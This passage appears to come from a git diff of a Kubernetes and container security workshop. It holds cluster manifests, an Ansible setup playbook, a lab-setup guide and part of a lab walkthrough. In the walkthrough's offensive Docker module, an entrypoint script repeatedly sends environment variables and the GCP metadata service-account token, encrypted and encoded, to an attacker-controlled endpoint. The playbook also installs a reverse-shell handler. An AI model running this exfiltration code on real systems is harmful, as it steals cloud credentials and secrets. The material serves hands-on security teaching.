+ prometheus.io/scrape: 'true'
+ prometheus.io/port: '9090'
+spec:
+ selector:
+ app: juice-shop
+ type: NodePort
+ ports:
+ - port: 8080
+ nodePort: 30030
+ targetPort: 3000
diff --git a/current/k8s-manifests/supply-chain-demo.yaml b/current/k8s-manifests/supply-chain-demo.yaml
new file mode 100644
index 0000000..ceaf2c6
--- /dev/null
+++ b/current/k8s-manifests/supply-chain-demo.yaml
@@ -0,0 +1,48 @@
+---
+# Unsigned image deployment - for demonstrating admission controller enforcement
+apiVersion: v1
+kind: Pod
+metadata:
+ name: unsigned-app
+ namespace: pls-dont-hack-me
+ labels:
+ app: unsigned-app
+ demo: supply-chain
+spec:
+ containers:
+ - name: unsigned-app
+ image: ubuntu:22.04
+ command: ["/bin/sh", "-c", "--"]
+ args: ["echo 'I am an unsigned image'; while true; do sleep 30; done;"]
+ resources:
+ requests:
+ memory: "64Mi"
+ cpu: "250m"
+ limits:
+ memory: "128Mi"
+ cpu: "500m"
+---
+# Trojanized image analysis target - a known-vulnerable image for scanning demos
+apiVersion: v1
+kind: Pod
+metadata:
+ name: vuln-scan-target
+ namespace: pls-dont-hack-me
+ labels:
+ app: vuln-scan-target
+ demo: supply-chain
+spec:
+ containers:
+ - name: vuln-target
+ image: vulnerables/web-dvwa:latest
+ resources:
+ requests:
+ memory: "128Mi"
+ cpu: "250m"
+ limits:
+ memory: "256Mi"
+ cpu: "500m"
+ ports:
+ - containerPort: 80
+ command: ["/bin/sh", "-c", "--"]
+ args: ["while true; do sleep 30; done;"]
diff --git a/current/kind-lab-config.yaml b/current/kind-lab-config.yaml
new file mode 100644
index 0000000..39c61ce
--- /dev/null
+++ b/current/kind-lab-config.yaml
@@ -0,0 +1,15 @@
+# Lab cluster setup
+kind: Cluster
+apiVersion: kind.x-k8s.io/v1alpha4
+name: lab
+# 1 control plane node and 2 workers
+nodes:
+# All nodes use v1.31.4 image matching our target K8s version
+# the control plane node config
+- role: control-plane
+ image: kindest/node:v1.31.4
+# the two workers
+- role: worker
+ image: kindest/node:v1.31.4
+- role: worker
+ image: kindest/node:v1.31.4
diff --git a/current/lab-ansible-setup.yml b/current/lab-ansible-setup.yml
new file mode 100644
index 0000000..c246684
--- /dev/null
+++ b/current/lab-ansible-setup.yml
@@ -0,0 +1,387 @@
+---
+- name: Setup localhost
+ hosts: localhost
+ gather_facts: false
+ vars:
+ kubectl_ver: "v1.31.4"
+ helm_ver: "v3.16.4"
+ kind_ver: "v0.27.0"
+ cosign_ver: "v2.4.1"
+ crane_ver: "v0.20.2"
+ syft_ver: "1.18.1"
+ grype_ver: "0.85.0"
+ tasks:
+ - name: Install Docker and other dependencies
+ ansible.builtin.apt:
+ pkg:
+ - docker.io
+ - etcd-client
+ - jq
+ - unzip
+ - python3-pip
+ - python3-venv
+ update_cache: true
+ become: true
+
+ - name: Install Python packages for reverse shell handler
+ ansible.builtin.pip:
+ name:
+ - twisted==24.10.0
+ - pyopenssl==24.3.0
+ - service_identity==24.2.0
+ state: present
+
+ - name: Add current user to Docker group
+ ansible.builtin.user:
+ name: "{{ lookup('env', 'USER') }}"
+ groups: docker
+ append: true
+ become: true
+
+ - name: Create a directory for downloads
+ ansible.builtin.file:
+ path: "/tmp/lab-setup"
+ state: directory
+ mode: '0755'
+ register: download
+
+ # --- ngrok ---
+ - name: Download ngrok
+ ansible.builtin.uri:
+ url: https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
+ dest: "{{ download.path }}/ngrok.tgz"
+ register: ngrok
+
+ - name: Extract ngrok
+ ansible.builtin.unarchive:
+ src: "{{ ngrok.path }}"
+ dest: "/usr/local/bin/"
+ become: true
+
+ # --- kubectl ---
+ - name: Download kubectl {{ kubectl_ver }}
+ ansible.builtin.uri:
+ url: "https://dl.k8s.io/release/{{ kubectl_ver }}/bin/linux/amd64/kubectl"
+ dest: "{{ download.path }}/kubectl"
+ register: kubectl
+
+ - name: Get file hash for kubectl
+ ansible.builtin.uri:
+ url: "https://dl.k8s.io/release/{{ kubectl_ver }}/bin/linux/amd64/kubectl.sha256"
+ return_content: true
+ register: kubectl_sha256
+
+ - name: Verify kubectl checksum
+ ansible.builtin.shell: |
+ set -o pipefail
+ echo "{{ kubectl_sha256.content | trim }}  {{ kubectl.path }}" | sha256sum --check
+ args:
+ executable: /usr/bin/bash
+ register: cmd_output
+ failed_when:
+ - "'OK' not in cmd_output.stdout"
+ changed_when:
+ - "'OK' in cmd_output.stdout"
+
+ - name: Show download result
+ ansible.builtin.debug:
+ msg: "Download of {{ cmd_output.stdout }}"
+
+ - name: Copy kubectl to final location and set permissions
+ ansible.builtin.copy:
+ src: "{{ kubectl.path }}"
+ dest: "/usr/local/bin/kubectl"
+ owner: root
+ group: root
+ mode: "+x"
+ become: true
+
+ - name: Check if kubectl is installed
+ ansible.builtin.command: kubectl version --output=yaml
+ register: client
+ failed_when: client.rc > 1
+ changed_when:
+ - "'clientVersion' in client.stdout"
+
+ - name: Show kubectl client version
+ ansible.builtin.debug:
+ msg: "{{ client.stdout_lines }}"
+
+ # --- Helm ---
+ - name: Download helm {{ helm_ver }}
+ ansible.builtin.uri:
+ url: "https://get.helm.sh/helm-{{ helm_ver }}-linux-amd64.tar.gz"
+ dest: "{{ download.path }}/helm.tar.gz"
+ register: helm
+
+ - name: Get file hash for helm
+ ansible.builtin.uri:
+ url: "https://get.helm.sh/helm-{{ helm_ver }}-linux-amd64.tar.gz.sha256"
+ return_content: true
+ register: helm_sha256
+
+ - name: Verify helm checksum
+ ansible.builtin.shell: |
+ set -o pipefail
+ echo "{{ helm_sha256.content | trim }}  {{ helm.path }}" | sha256sum --check
+ args:
+ executable: /usr/bin/bash
+ register: cmd_output
+ failed_when:
+ - "'OK' not in cmd_output.stdout"
+ changed_when:
+ - "'OK' in cmd_output.stdout"
+
+ - name: Extract helm
+ ansible.builtin.unarchive:
+ src: "{{ helm.path }}"
+ dest: "{{ download.path }}"
+
+ - name: Install helm
+ ansible.builtin.copy:
+ src: "{{ download.path }}/linux-amd64/helm"
+ dest: "/usr/local/bin/helm"
+ owner: root
+ group: root
+ mode: "+x"
+ become: true
+
+ # --- Helm repos (removed deprecated charts.helm.sh/stable) ---
+ - name: Add prometheus community helm repo
+ ansible.builtin.command: helm repo add prometheus-community https://prometheus-community.github.io/helm-charts
+ register: helm_repo
+ changed_when: "'added' in helm_repo.stdout"
+
+ - name: Add Grafana helm charts repo
+ ansible.builtin.command: helm repo add grafana https://grafana.github.io/helm-charts
+ register: helm_repo
+ changed_when: "'added' in helm_repo.stdout"
+
+ - name: Add Tracee helm charts repo
+ ansible.builtin.command: helm repo add aqua https://aquasecurity.github.io/helm-charts/
+ register: helm_repo
+ changed_when: "'added' in helm_repo.stdout"
+
+ - name: Add Falco helm charts repo
+ ansible.builtin.command: helm repo add falcosecurity https://falcosecurity.github.io/charts
+ register: helm_repo
+ changed_when: "'added' in helm_repo.stdout"
+
+ - name: Add Cilium (Tetragon) helm charts repo
+ ansible.builtin.command: helm repo add cilium https://helm.cilium.io/
+ register: helm_repo
+ changed_when: "'added' in helm_repo.stdout"
+
+ - name: Do helm repo update
+ ansible.builtin.command: helm repo update
+ register: helm_repo
+ changed_when: "'Update Complete' in helm_repo.stdout"
+
+ # --- kind ---
+ - name: Download kind {{ kind_ver }}
+ ansible.builtin.uri:
+ url: "https://kind.sigs.k8s.io/dl/{{ kind_ver }}/kind-linux-amd64"
+ dest: "{{ download.path }}/kind"
+ register: kind
+
+ - name: Copy kind to final location and set permissions
+ ansible.builtin.copy:
+ src: "{{ kind.path }}"
+ dest: "/usr/local/bin/kind"
+ owner: root
+ group: root
+ mode: "+x"
+ become: true
+
+ - name: Create kind autocomplete
+ ansible.builtin.shell: |
+ kind completion bash > {{ lookup('env', 'HOME') }}/.kind_completion
+ echo "source {{ lookup('env', 'HOME') }}/.kind_completion" >> {{ lookup('env', 'HOME') }}/.bashrc
+ args:
+ creates: "{{ lookup('env', 'HOME') }}/.kind_completion"
+
+ # --- cosign (Sigstore) ---
+ - name: Download cosign {{ cosign_ver }}
+ ansible.builtin.uri:
+ url: "https://github.com/sigstore/cosign/releases/download/{{ cosign_ver }}/cosign-linux-amd64"
+ dest: "{{ download.path }}/cosign"
+ register: cosign
+
+ - name: Install cosign
+ ansible.builtin.copy:
+ src: "{{ cosign.path }}"
+ dest: "/usr/local/bin/cosign"
+ owner: root
+ group: root
+ mode: "+x"
+ become: true
+
+ # --- crane (go-containerregistry) ---
+ - name: Download crane {{ crane_ver }}
+ ansible.builtin.uri:
+ url: "https://github.com/google/go-containerregistry/releases/download/{{ crane_ver }}/go-containerregistry_Linux_x86_64.tar.gz"
+ dest: "{{ download.path }}/crane.tar.gz"
+ register: crane_download
+
+ - name: Extract crane
+ ansible.builtin.unarchive:
+ src: "{{ crane_download.path }}"
+ dest: "{{ download.path }}"
+
+ - name: Install crane
+ ansible.builtin.copy:
+ src: "{{ download.path }}/crane"
+ dest: "/usr/local/bin/crane"
+ owner: root
+ group: root
+ mode: "+x"
+ become: true
+
+ # --- syft (SBOM generator) ---
+ - name: Install syft via install script
+ ansible.builtin.shell: |
+ curl -sSfL https://raw.githubusercontent.com/anchore/syft/main/install.sh | sh -s -- -b /usr/local/bin v{{ syft_ver }}
+ args:
+ creates: /usr/local/bin/syft
+ become: true
+
+ # --- grype (vulnerability scanner) ---
+ - name: Install grype via install script
+ ansible.builtin.shell: |
+ curl -sSfL https://raw.githubusercontent.com/anchore/grype/main/install.sh | sh -s -- -b /usr/local/bin v{{ grype_ver }}
+ args:
+ creates: /usr/local/bin/grype
+ become: true
+
+ # --- Download workshop files from repo ---
+ - name: Download kind lab configuration
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/kind-lab-config.yaml
+ dest: "{{ playbook_dir }}/kind-lab-config.yaml"
+
+ - name: Download k8s cluster ansible playbook
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-ansible-setup.yml
+ dest: "{{ playbook_dir }}/k8s-ansible-setup.yaml"
+
+ - name: Create k8s-manifest directory
+ ansible.builtin.file:
+ path: "{{ playbook_dir }}/k8s-manifests"
+ state: directory
+ mode: '0750'
+
+ - name: Download k8s clusterroles manifest
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-manifests/clusterroles.yaml
+ dest: "{{ playbook_dir }}/k8s-manifests/clusterroles.yaml"
+
+ - name: Download k8s clusterrolebindings manifest
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-manifests/clusterrolebindings.yaml
+ dest: "{{ playbook_dir }}/k8s-manifests/clusterrolebindings.yaml"
+
+ - name: Download k8s service accounts manifest
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-manifests/serviceaccounts.yaml
+ dest: "{{ playbook_dir }}/k8s-manifests/serviceaccounts.yaml"
+
+ - name: Download k8s namespace manifest
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-manifests/namespaces.yaml
+ dest: "{{ playbook_dir }}/k8s-manifests/namespaces.yaml"
+
+ - name: Download k8s deployments manifest
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-manifests/deployments.yaml
+ dest: "{{ playbook_dir }}/k8s-manifests/deployments.yaml"
+
+ - name: Download k8s pods manifest
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-manifests/pods.yaml
+ dest: "{{ playbook_dir }}/k8s-manifests/pods.yaml"
+
+ - name: Download k8s services manifest
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-manifests/services.yaml
+ dest: "{{ playbook_dir }}/k8s-manifests/services.yaml"
+
+ - name: Download k8s roles manifest
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-manifests/roles.yaml
+ dest: "{{ playbook_dir }}/k8s-manifests/roles.yaml"
+
+ - name: Download k8s rolebindings manifest
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-manifests/rolebindings.yaml
+ dest: "{{ playbook_dir }}/k8s-manifests/rolebindings.yaml"
+
+ - name: Download k8s secrets manifest
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-manifests/secrets.yaml
+ dest: "{{ playbook_dir }}/k8s-manifests/secrets.yaml"
+
+ - name: Download k8s evilpod manifest
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-manifests/evilpod.yaml
+ dest: "{{ playbook_dir }}/k8s-manifests/evilpod.yaml"
+
+ - name: Download k8s attacker-pod manifest
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-manifests/attacker-pod.yaml
+ dest: "{{ playbook_dir }}/k8s-manifests/attacker-pod.yaml"
+
+ - name: Download k8s nothingallowedpod manifest
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-manifests/nothingallowedpod.yaml
+ dest: "{{ playbook_dir }}/k8s-manifests/nothingallowedpod.yaml"
+
+ - name: Download supply chain demo manifests
+ ansible.builtin.uri:
+ url: "https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/k8s-manifests/{{ item }}"
+ dest: "{{ playbook_dir }}/k8s-manifests/{{ item }}"
+ loop:
+ - supply-chain-demo.yaml
+ - imds-demo-pod.yaml
+ - network-policy-demo.yaml
+
+ - name: Create helm config directory
+ ansible.builtin.file:
+ path: "{{ playbook_dir }}/helm-config"
+ state: directory
+ mode: '0750'
+
+ - name: Download grafana helm config
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/helm-config/grafana-config.yaml
+ dest: "{{ playbook_dir }}/helm-config/grafana-config.yaml"
+
+ - name: Download promtail helm config
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/helm-config/promtail-config.yaml
+ dest: "{{ playbook_dir }}/helm-config/promtail-config.yaml"
+
+ - name: Create scripts directory
+ ansible.builtin.file:
+ path: "{{ playbook_dir }}/scripts"
+ state: directory
+ mode: '0750'
+
+ - name: Download reverse shell handler
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/scripts/reverse_shell_handler.py
+ dest: "{{ playbook_dir }}/scripts/reverse_shell_handler.py"
+
+ - name: Download verification script
+ ansible.builtin.uri:
+ url: https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/scripts/verify-setup.sh
+ dest: "{{ playbook_dir }}/scripts/verify-setup.sh"
+ mode: '0755'
+
+ - name: Clean up
+ ansible.builtin.file:
+ path: "/tmp/lab-setup"
+ state: absent
+
+ - name: Tell user to exit terminal and start a new one
+ ansible.builtin.debug:
+ msg: "Step 3 of setup finished, close this terminal and open a new one."
diff --git a/current/lab-setup.md b/current/lab-setup.md
new file mode 100644
index 0000000..9b72758
--- /dev/null
+++ b/current/lab-setup.md
@@ -0,0 +1,195 @@
+# Malicious Kubernetes Workshop - Lab Setup
+
+
+Welcome to the Malicious Kubernetes workshop. The following instructions will help you set up the lab environment. The K8s lab is built with `kind` (Kubernetes in Docker) for rapid prototyping and `ansible` for orchestration. It's not suitable for production usage, but it builds fast and reliably given our time constraints.
+
+If you have questions about running the lab on something other than GCP, see the [FAQ](#FAQ) at the end.
+
+**Time:** 5-10 mins including spinning dials
+
+## Prerequisites
+
+- A cloud VM (GCP recommended, AWS/Azure also work)
+- **OS:** Ubuntu 22.04 LTS
+- **Size:** e2-standard-2 (2 vCPU, 8GB RAM) or equivalent
+- SSH access to the VM
+
+## Tools Installed by Ansible
+
+| Tool | Version | Purpose |
+|------|---------|---------|
+| kubectl | v1.31.4 | Kubernetes CLI |
+| kind | v0.27.0 | Local K8s clusters |
+| Helm | v3.16.4 | K8s package manager |
+| cosign | v2.4.1 | Image signing (Sigstore) |
+| crane | v0.20.2 | Container registry tool |
+| syft | v1.18.1 | SBOM generation |
+| grype | v0.85.0 | Vulnerability scanning |
+| ngrok | v3 stable | Tunneling |
+| Docker | OS package | Container runtime |
+
+---
+
+**1. Create a new VM instance.** Select an e2-standard-2 for this session so that you can run a large number of nodes and pods.
+This works out to roughly $51.92 per month, or about $0.07 per hour, which the free credits you get when registering a new account will easily cover.
+Go to https://cloud.google.com/free and create an account, or log in.
+
+
+**1a. Enable the compute API:**
+
+
+
+
+
+**1b. Configure the machine:**
+
+- **Machine type:** e2-standard-2
+- **Boot disk:** Ubuntu 22.04 LTS, 20 GB
+
+
+
+**1c. Configure the boot disk and image size.**
+
+
+
+**2. Connect to the instance over SSH.** GCloud has a nice web-browser-based SSH client that will work fine for the lab:
+
+
+
+**3. Run the following setup commands:**
+
+```
+sudo apt update && sudo apt install -y python3-pip
+```
+
+```
+sudo pip install ansible
+```
+
+```
+curl -LO https://raw.githubusercontent.com/lockfale/Malicious_Containers_Workshop/main/current/lab-ansible-setup.yml
+```
+
+```
+ansible-playbook lab-ansible-setup.yml
+```
+
+**4. Open a new terminal.** `exit` the existing session and start a new one so the changes made by the playbook take effect.
+
+ ```
+ kind version
+ ```
+
+ ```
+ kind create cluster --image=kindest/node:v1.31.4
+ ```
+
+
+**Note:** By default kind will pull an older version of Kubernetes, so the `--image` argument specifies the version we want.
+
+```
+kubectl version
+```
+
+```
+docker ps
+```
+
+```
+kind get clusters
+```
+
+
+```
+kind delete cluster
+```
+
+
+**5. Build Lab Cluster**
+
+ The ansible playbook downloaded a file for you:
+ ```
+ less kind-lab-config.yaml
+ ```
+
+ Note that the YAML file is annotated, so you can understand how it works.
+
+ Press ↓ and ↑ to scroll through the file, and `q` to exit.
+
+ Run the following command to set up the kind cluster:
+
+ ```
+ kind create cluster --config=kind-lab-config.yaml
+ ```
+
+ This may take a couple of minutes, go get a coffee or something.
+
+ **6. Confirm lab is operational**
+
+ ```
+ kubectl cluster-info --context kind-lab
+ ```
+
+```
+kubectl get nodes
+```
+
+You should see 2 worker nodes and a control plane running.
+
+
+
+**7. Setup ngrok account**
+
+Sign up for a free ngrok account on https://ngrok.com, you can OAuth through the same Google Account if you want to keep it simple.
+
+You'll likely get redirected to a Setup & Installation page under Getting Started once you're signed in.
+
+Run the command under "Connect your account" in the terminal on your VM. You won't need to run the `unzip` command because ansible already installed ngrok for you.
+
+
+
+Example: `ngrok config add-authtoken `
+
+Ngrok will be used for some exercises, so having this step completed ahead of time will be useful.
+
+You can check if ngrok is working with `ngrok http 80`.
+
+**8. Verify setup (optional)**
+
+Run the verification script to check all tools are installed correctly:
+```
+bash scripts/verify-setup.sh
+```
+
+**9. Do not turn off the VM after setup whilst waiting for the workshop. Otherwise you'll lose all the above (ephemeral storage).**
+
+
+**Troubleshooting note:**
+
+If you end up with an empty kubeconfig (`~/.kube/config`), your session was probably duplicated rather than restarted after you installed kind. Exit your session and start a new one before continuing.
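A quick way to check for that condition (a sketch assuming the default kubeconfig path; adjust if you set `$KUBECONFIG`):

```
CFG="${KUBECONFIG:-$HOME/.kube/config}"
if [ -s "$CFG" ]; then
    echo "kubeconfig present: $CFG"
else
    echo "kubeconfig missing or empty: $CFG"
fi
```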
+
+## Alternative Cloud Providers
+
+### AWS
+- Launch an EC2 instance: `t3.large` (2 vCPU, 8GB RAM)
+- AMI: Ubuntu 22.04 LTS
+- Security group: Allow inbound SSH (port 22)
+- The ansible playbook works the same way on AWS
+
+### Azure
+- Create a VM: `Standard_D2s_v3` (2 vCPU, 8GB RAM)
+- Image: Ubuntu 22.04 LTS
+- NSG: Allow inbound SSH (port 22)
+
+## FAQ
+
+**Can I just use my own local VM?**
+
+We discourage the use of local VMs during live workshops for several reasons. First, platform agnosticism — we want everyone to participate regardless of their OS/hardware. Second, bandwidth — downloading container images over shared wifi is slow and can cause issues for other students. Cloud VMs download images from the datacenter in seconds.
+
+After the workshop, you're welcome to run the lab setup on a local VM for personal use.
+
+**Can I just use my own favorite cloud provider?**
+
+If you want to use a provider other than GCP, go ahead at your own risk. The lab setup should work on any VM running Ubuntu 22.04 LTS. We recommend GCP during workshops for consistency, but AWS and Azure work fine too.
diff --git a/current/labs_walk_thru.md b/current/labs_walk_thru.md
new file mode 100644
index 0000000..efc04ef
--- /dev/null
+++ b/current/labs_walk_thru.md
@@ -0,0 +1,1962 @@
+# Labs Walk Thru
+**This file accompanies the slides with the lab instructions and commands to help walk thru the labs. It's especially intended for those who have trouble copying and pasting from the slides, or prefer not to.**
+
+**If viewing on GitHub, you can navigate using the table of contents button in the top left next to the line count.**
+
+## Module 1 - Docker
+
+#### Slide 17 - Exercise - is this thing on?
+
+```
+docker --help
+```
+
+```
+docker run --help
+```
+
+#### Slide 18 - Troubleshoot (Docker health check)
+
+If Docker is reporting down, or the VM was stopped after setup, try running these commands:
+
+```
+sudo apt install acl -y
+```
+```
+sudo systemctl status docker
+```
+Run this if the status is not reporting up:
+
+```
+sudo systemctl restart docker
+```
+
+Create this ACL so you can run docker commands without typing sudo every time.
+```
+sudo setfacl -m user:$USER:rw /var/run/docker.sock
+```
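If you want to sanity-check the ACL mechanism itself, here's a small sketch against a scratch file rather than the Docker socket (it assumes the `acl` package from the step above, and falls back gracefully if `setfacl` is missing):

```
# demo the same setfacl pattern on a throwaway file
USERNAME=$(id -un)
touch /tmp/acl-demo
if command -v setfacl >/dev/null 2>&1; then
    setfacl -m "user:${USERNAME}:rw" /tmp/acl-demo
    getfacl -c /tmp/acl-demo
else
    echo "setfacl not available; install the acl package first"
fi
```

You can inspect the socket's ACL the same way with `getfacl /var/run/docker.sock`.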
+
+#### Slide 19 - Babby's first image
+```
+docker run hello-world
+```
+
+### Slide 20 - Single Command/Interactive Containers
+
+Running single command in a container
+```
+docker run alpine ip addr
+```
+
+Run an interactive session (shell) within a container (interactive terminal):
+```
+docker run -it alpine /bin/ash
+```
+Type `exit` to exit the shell session in the container
+
+> -i, --interactive Keep STDIN open even if not attached
+>
+> -t, --tty Allocate a pseudo-TTY
+
+### Slide 21 - Interactive Containers (cont)
+
+List running containers:
+```
+docker ps
+```
+Where's the container, was it destroyed?
+```
+docker ps --all
+```
+
+Note: Replace `<container_id>` below with the container id from the output of the above command.
+ - Tip: you usually only need the first few letters of the id for Docker to locate it.
+
+```
+docker start <container_id>
+```
+```
+docker ps
+```
+```
+docker attach <container_id>
+```
+
+Note: exit once done
+```
+exit
+```
+
+### Slide 22 - Background a container
+
+```
+docker run -d nginx
+```
+
+```
+docker ps
+```
+
+```
+docker stop <container_id>
+```
+
+Override the container name (optional):
+```
+docker run --name webserver -d nginx
+```
+```
+docker container ls
+```
+
+### Slide 23 - Container Persistence
+
+```
+docker ps -a
+```
+
+### Slide 24 - Process Hierarchy
+
+```
+docker run -d nginx
+```
+```
+ps auxf
+```
+
+## Module 2 - Exploring Containers
+
+### Slide 27 - Where do images come from?
+
+```
+docker search nmap
+```
+
+### Slide 29 - Exercise: Exploring Images and Container History
+
+```
+docker run --name hist -it alpine /bin/ash
+```
+Inside the container shell run:
+```
+mkdir test && touch /test/Lorem
+```
+```
+exit
+```
+Back on the host run:
+```
+docker container diff hist
+```
+```
+docker container commit hist history_test
+```
+```
+docker image history history_test
+```
+
+### Slide 30 - Exercise: Exploring Container Images and History from DockerHub
+
+```
+docker search dropboxservice
+```
+
+### Slide 31 - Docker Image History
+
+```
+docker pull mkefi/dropboxservice:latest
+```
+
+```
+docker image ls
+```
+
+```
+docker history mkefi/dropboxservice
+```
+
+```
+docker history --no-trunc --format "{{.CreatedAt}}: {{.CreatedBy}}" mkefi/dropboxservice |less
+```
+
+> Use up and down arrow keys or `[SPACE]` to navigate, type `q` to quit
+
+### Slide 33 - Extract without running
+
+```
+docker create mkefi/dropboxservice
+```
+
+Note: Replace `$container_id` with the container ID returned by the last command (you only need the first part).
+```
+docker cp $container_id:/dropboxservice.jar /tmp/app.jar
+```
+```
+ls /tmp/*.jar
+```
+```
+vim /tmp/app.jar
+```
+Remember `[ESC]` then `:q!` to exit from vim/view without saving
+
+Now that we've extracted the jar, we can remove the container. Use same container id from a few commands ago for command below.
+```
+docker rm $container_id
+```
+
+### Slide 34 - Optional, quick checks
+
+```
+file /tmp/app.jar
+```
+```
+mkdir /tmp/app
+```
+```
+unzip /tmp/app.jar -d /tmp/app/
+```
+```
+cat /tmp/app/META-INF/MANIFEST.MF
+```
+Note the `Start-Class` entry in the manifest
+```
+strings /tmp/app.jar |less
+```
+
+### Slide 35 - Going the distance - decompile (with docker!)
+
+```
+docker run -it --rm -v /tmp/:/mnt/ --user $(id -u):$(id -g) kwart/jd-cli /mnt/app.jar -od /mnt/app-decompiled
+```
+
+```
+ls /tmp/app-decompiled/
+```
+
+```
+less /tmp/app-decompiled/BOOT-INF/classes/application.yml
+```
+
+### Slide 36 - Manual Reversing (just another way of extracting files from an image)
+
+```
+cd ~ && mkdir testimage && cd testimage
+```
+```
+docker pull nginx
+```
+```
+docker save -o nginx.tar nginx
+```
+```
+tar -xvf nginx.tar
+```
+
+### Slide 37 - Manual Reversing cont.
+
+```
+cat <layer_directory>/json | jq
+```
+
+Note: Replace `<layer_directory>` with one of the layer directories extracted from the tarball in the previous step.
+
+### Slide 39 - Optional - Automated
+
+```
+sudo docker run -t --rm -v /var/run/docker.sock:/var/run/docker.sock:ro pegleg/whaler -sV=1.36 nginx:latest
+```
+```
+sudo docker run -t --rm -v /var/run/docker.sock:/var/run/docker.sock:ro pegleg/whaler -sV=1.36 mkefi/dropboxservice
+```
+
+### Slide 42 - Watch out: Exposing Services
+
+```
+docker run -d -p 8080:80 nginx
+```
+
+### Slide 43 - is nginx real?
+
+```
+docker image inspect nginx | jq
+```
+
+```
+docker trust inspect nginx | jq
+```
+
+## Module 3: Offensive Docker Techniques
+
+### ~~Slide 48 - Starting Tracee~~
+Skipping slide 48 content - it's already running automatically and feeding Grafana for you now. We will look at it in Module 8!
+
+Start a new terminal window
+
+Run both of these commands in the new terminal window:
+
+```
+docker run --name tracee -d --rm --pid=host --cgroupns=host --privileged -v /etc/os-release:/etc/os-release-host:ro \
+-e LIBBPFGO_OSRELEASE_FILE=/etc/os-release-host aquasec/tracee:latest
+```
+
+
+```
+docker logs tracee --follow 2>&1 |grep MatchedPolicies
+```
+
+### Slide 49 - Create a Dockerfile
+
+Switch back to original window to run the following commands below:
+
+```
+cd ~ && mkdir imagetest && cd imagetest && vi Dockerfile
+```
+
+Note: Go to pipedream.com, create an account, and set up a new HTTP endpoint to receive requests
+
+### Slide 50 - Create a Dockerfile
+
+Paste the below contents into the vi after hitting `i` for insert
+```
+FROM ubuntu:22.04
+RUN groupadd -g 999 usertest && \
+useradd -r -u 999 -g usertest usertest
+RUN apt update && apt install -y curl tini
+COPY ./docker-entrypoint.sh /docker-entrypoint.sh
+RUN chmod +x docker-entrypoint.sh
+USER usertest
+# Go to pipedream.com and get an HTTP endpoint URL, replace below
+ENV URL PIPEDREAM_URL
+ENV UA "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.8.1.7) Gecko/20070917 BonEcho/2.0.0.7"
+# Replace HANDLE with your l33t hacker name or some other identifying designation
+ENV USER HANDLE
+# add a password
+ENV PW PASSWORD
+ENTRYPOINT ["/usr/bin/tini", "--", "/docker-entrypoint.sh"]
+```
+> After pasting, hit `[ESC]`, then type `:wq`
+
+
+### Slide 51 - Create an entrypoint script
+
+```
+vi docker-entrypoint.sh
+```
+
+### Slide 52 - Create an entrypoint script
+
+Paste the below script into the vi after hitting `i` for insert
+```
+#!/usr/bin/env bash
+
+if [ "shell" = "${1}" ]; then
+ /bin/bash
+else
+ while true
+ do
+ sleep 30
+ curl -s -X POST -A "${UA}" -H "X-User: ${USER}" -H "Cookie: `uname -a | gzip | base64 -w0`" -d \
+`{ env && curl -s -H 'Metadata-Flavor:Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token; } | gzip | openssl enc -e -aes-256-cbc -md sha512 -pbkdf2 -salt -a -pass "pass:${PW}" | base64 -w0` \
+$URL
+ echo
+ done
+fi
+```
+> After pasting, hit `ESC`, then type `:wq`
+
+### Slide 53 - Build and run your image
+
+```
+docker build -t cmddemo .
+```
+
+```
+docker run --name demo -d cmddemo
+```
+
+```
+docker logs demo --follow 2>&1
+```
+
+
+### Slide 54 - Build and run your image (cont.)
+
+The trick to this one is pasting the contents of the cookie field from the request you received on Pipedream into the base64 command below, which decodes it and pipes it through gunzip to decompress the contents.
+```
+base64 -d <<< [cookie field content] | gunzip
+```
+
+>Take a look back at the tracee terminal per slide 52
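The encrypted request body can be recovered the same way in reverse. Below is a self-contained round-trip sketch of the entrypoint's encryption pipeline, using made-up sample data and password; to decode a real capture, set `BODY` to the request body from Pipedream and `PW` to the password you baked into the image:

```
PW="PASSWORD"   # stand-in for the PW env var from the Dockerfile
# encrypt the way the entrypoint script does: gzip -> openssl -> base64
BODY=$(echo "uid=999(usertest)" | gzip | openssl enc -e -aes-256-cbc -md sha512 -pbkdf2 -salt -a -pass "pass:${PW}" | base64 -w0)
# decrypt: undo the outer base64, then openssl, then gunzip
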